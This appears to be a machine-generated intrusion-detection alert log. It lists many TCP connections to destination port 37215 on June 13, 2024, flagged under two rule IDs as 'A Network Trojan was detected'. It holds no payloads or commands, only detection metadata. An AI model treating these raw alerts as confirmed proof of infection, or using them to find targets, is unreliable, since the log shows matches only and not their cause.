              SID:2829579
              Source Port:38264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279278
              SID:2835222
              Source Port:55452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169634
              SID:2835222
              Source Port:47908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676846
              SID:2829579
              Source Port:39646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.489024
              SID:2835222
              Source Port:54622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676572
              SID:2835222
              Source Port:53722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630211
              SID:2835222
              Source Port:48558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940700
              SID:2835222
              Source Port:54118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246618
              SID:2829579
              Source Port:58764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087750
              SID:2829579
              Source Port:50564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525963
              SID:2829579
              Source Port:56942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.091741
              SID:2835222
              Source Port:40558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451258
              SID:2835222
              Source Port:46842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229080
              SID:2829579
              Source Port:51738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091597
              SID:2835222
              Source Port:34148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272132
              SID:2829579
              Source Port:49676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839495
              SID:2835222
              Source Port:45290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436421
              SID:2829579
              Source Port:37944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317636
              SID:2829579
              Source Port:56634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212973
              SID:2835222
              Source Port:49490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680759
              SID:2835222
              Source Port:43510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256940
              SID:2829579
              Source Port:37378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238528
              SID:2835222
              Source Port:38872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502018
              SID:2835222
              Source Port:59134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822931
              SID:2829579
              Source Port:53102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543980
              SID:2829579
              Source Port:49586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403934
              SID:2835222
              Source Port:53948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224061
              SID:2829579
              Source Port:38492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.368983
              SID:2835222
              Source Port:46318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476249
              SID:2835222
              Source Port:55286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678529
              SID:2829579
              Source Port:48602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452207
              SID:2829579
              Source Port:56008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669252
              SID:2835222
              Source Port:41734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095292
              SID:2835222
              Source Port:35996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191432
              SID:2835222
              Source Port:50744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263803
              SID:2829579
              Source Port:39950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.933902
              SID:2829579
              Source Port:47884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824477
              SID:2829579
              Source Port:38192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.164575
              SID:2835222
              Source Port:55536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834441
              SID:2829579
              Source Port:39382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.156564
              SID:2829579
              Source Port:33670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098823
              SID:2829579
              Source Port:47982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108284
              SID:2835222
              Source Port:46546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569899
              SID:2835222
              Source Port:60468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195012
              SID:2829579
              Source Port:37694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730803
              SID:2829579
              Source Port:37624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943474
              SID:2835222
              Source Port:57168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014289
              SID:2835222
              Source Port:49356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198270
              SID:2829579
              Source Port:58100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.938022
              SID:2829579
              Source Port:50614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088671
              SID:2829579
              Source Port:47748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223900
              SID:2829579
              Source Port:58416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298538
              SID:2829579
              Source Port:40480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237890
              SID:2835222
              Source Port:40906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509916
              SID:2835222
              Source Port:33406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170805
              SID:2835222
              Source Port:57126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150879
              SID:2835222
              Source Port:44584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174531
              SID:2835222
              Source Port:40836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505526
              SID:2829579
              Source Port:44228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274005
              SID:2835222
              Source Port:38676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228184
              SID:2829579
              Source Port:48622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868309
              SID:2829579
              Source Port:37084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.280074
              SID:2829579
              Source Port:45622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782377
              SID:2829579
              Source Port:39532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401003
              SID:2835222
              Source Port:37596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345419
              SID:2835222
              Source Port:47024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.524903
              SID:2829579
              Source Port:33866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729996
              SID:2835222
              Source Port:45854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372966
              SID:2829579
              Source Port:40186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476607
              SID:2829579
              Source Port:58322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170531
              SID:2835222
              Source Port:39786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633218
              SID:2835222
              Source Port:59238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016642
              SID:2835222
              Source Port:37608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193123
              SID:2829579
              Source Port:49346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091365
              SID:2829579
              Source Port:55352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503025
              SID:2829579
              Source Port:51822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423274
              SID:2829579
              Source Port:48370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868792
              SID:2829579
              Source Port:37144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132450
              SID:2835222
              Source Port:60572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079117
              SID:2829579
              Source Port:44120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.406488
              SID:2829579
              Source Port:44100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077294
              SID:2829579
              Source Port:42542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842774
              SID:2829579
              Source Port:42356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710703
              SID:2829579
              Source Port:33982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354882
              SID:2835222
              Source Port:48396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501687
              SID:2829579
              Source Port:52370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091281
              SID:2829579
              Source Port:35034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970977
              SID:2835222
              Source Port:58182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972595
              SID:2829579
              Source Port:35762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974399
              SID:2835222
              Source Port:36192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317297
              SID:2835222
              Source Port:53882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309717
              SID:2829579
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176476
              SID:2829579
              Source Port:40114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174810
              SID:2835222
              Source Port:35752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353756
              SID:2829579
              Source Port:41552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568294
              SID:2835222
              Source Port:53988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633402
              SID:2835222
              Source Port:49792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911261
              SID:2829579
              Source Port:52884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408616
              SID:2835222
              Source Port:40928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198018
              SID:2829579
              Source Port:43540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671354
              SID:2835222
              Source Port:50718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133452
              SID:2829579
              Source Port:34708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322209
              SID:2829579
              Source Port:41344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092692
              SID:2835222
              Source Port:37528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239629
              SID:2829579
              Source Port:34736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154069
              SID:2829579
              Source Port:48202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042778
              SID:2829579
              Source Port:59150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175941
              SID:2835222
              Source Port:37386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636269
              SID:2835222
              Source Port:37884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791575
              SID:2835222
              Source Port:36240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417263
              SID:2835222
              Source Port:41308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418492
              SID:2835222
              Source Port:43906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038353
              SID:2829579
              Source Port:42468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872529
              SID:2835222
              Source Port:47902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675946
              SID:2835222
              Source Port:36182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820824
              SID:2829579
              Source Port:35708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871151
              SID:2835222
              Source Port:50664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174738
              SID:2835222
              Source Port:56180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133853
              SID:2835222
              Source Port:40168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.780350
              SID:2829579
              Source Port:49900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109393
              SID:2829579
              Source Port:58420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320210
              SID:2835222
              Source Port:35336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248431
              SID:2829579
              Source Port:42756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509312
              SID:2835222
              Source Port:40736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323377
              SID:2835222
              Source Port:45050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091258
              SID:2835222
              Source Port:54602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059607
              SID:2829579
              Source Port:34866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783269
              SID:2829579
              Source Port:47808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404570
              SID:2835222
              Source Port:35286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633274
              SID:2835222
              Source Port:37996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098143
              SID:2835222
              Source Port:58278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304092
              SID:2835222
              Source Port:41282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423499
              SID:2829579
              Source Port:60554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912761
              SID:2835222
              Source Port:36460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303519
              SID:2835222
              Source Port:42024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305444
              SID:2835222
              Source Port:58726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175424
              SID:2829579
              Source Port:34284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041828
              SID:2835222
              Source Port:44292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567421
              SID:2835222
              Source Port:60812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889862
              SID:2829579
              Source Port:45328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223635
              SID:2829579
              Source Port:45916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.248901
              SID:2835222
              Source Port:56538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786947
              SID:2829579
              Source Port:59168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175054
              SID:2829579
              Source Port:53312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824760
              SID:2835222
              Source Port:33622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128917
              SID:2829579
              Source Port:53268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677187
              SID:2829579
              Source Port:41722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200200
              SID:2835222
              Source Port:59522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839495
              SID:2829579
              Source Port:45290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306547
              SID:2829579
              Source Port:44912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126206
              SID:2829579
              Source Port:57682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.340972
              SID:2829579
              Source Port:47644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503232
              SID:2835222
              Source Port:51580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.085536
              SID:2835222
              Source Port:38380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079927
              SID:2835222
              Source Port:49134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379739
              SID:2835222
              Source Port:33468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.409626
              SID:2835222
              Source Port:40214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075531
              SID:2829579
              Source Port:38730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197067
              SID:2829579
              Source Port:48390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660410
              SID:2835222
              Source Port:37782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708990
              SID:2835222
              Source Port:33588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727062
              SID:2835222
              Source Port:52300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710552
              SID:2829579
              Source Port:45806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219409
              SID:2835222
              Source Port:51318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837233
              SID:2835222
              Source Port:36442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436737
              SID:2829579
              Source Port:44872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568567
              SID:2829579
              Source Port:43438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153859
              SID:2829579
              Source Port:54878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242332
              SID:2835222
              Source Port:56122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231551
              SID:2835222
              Source Port:55958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016844
              SID:2835222
              Source Port:59100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269367
              SID:2829579
              Source Port:49000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224553
              SID:2835222
              Source Port:47692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997287
              SID:2835222
              Source Port:41326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136042
              SID:2835222
              Source Port:39370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155970
              SID:2835222
              Source Port:54178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176728
              SID:2829579
              Source Port:44660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504246
              SID:2835222
              Source Port:34168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657772
              SID:2829579
              Source Port:51214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.611393
              SID:2829579
              Source Port:59844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238286
              SID:2835222
              Source Port:45102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888362
              SID:2829579
              Source Port:32982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974175
              SID:2829579
              Source Port:41886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048704
              SID:2835222
              Source Port:54980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217391
              SID:2835222
              Source Port:41588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419267
              SID:2829579
              Source Port:50016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419623
              SID:2829579
              Source Port:53878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507598
              SID:2835222
              Source Port:34460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245571
              SID:2835222
              Source Port:46612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841203
              SID:2829579
              Source Port:34446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569041
              SID:2829579
              Source Port:47600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039609
              SID:2835222
              Source Port:33992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450997
              SID:2829579
              Source Port:44516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821834
              SID:2835222
              Source Port:34230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635162
              SID:2835222
              Source Port:36992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488196
              SID:2829579
              Source Port:53864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.527865
              SID:2829579
              Source Port:44448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344321
              SID:2835222
              Source Port:57538
              Destination Port:37215
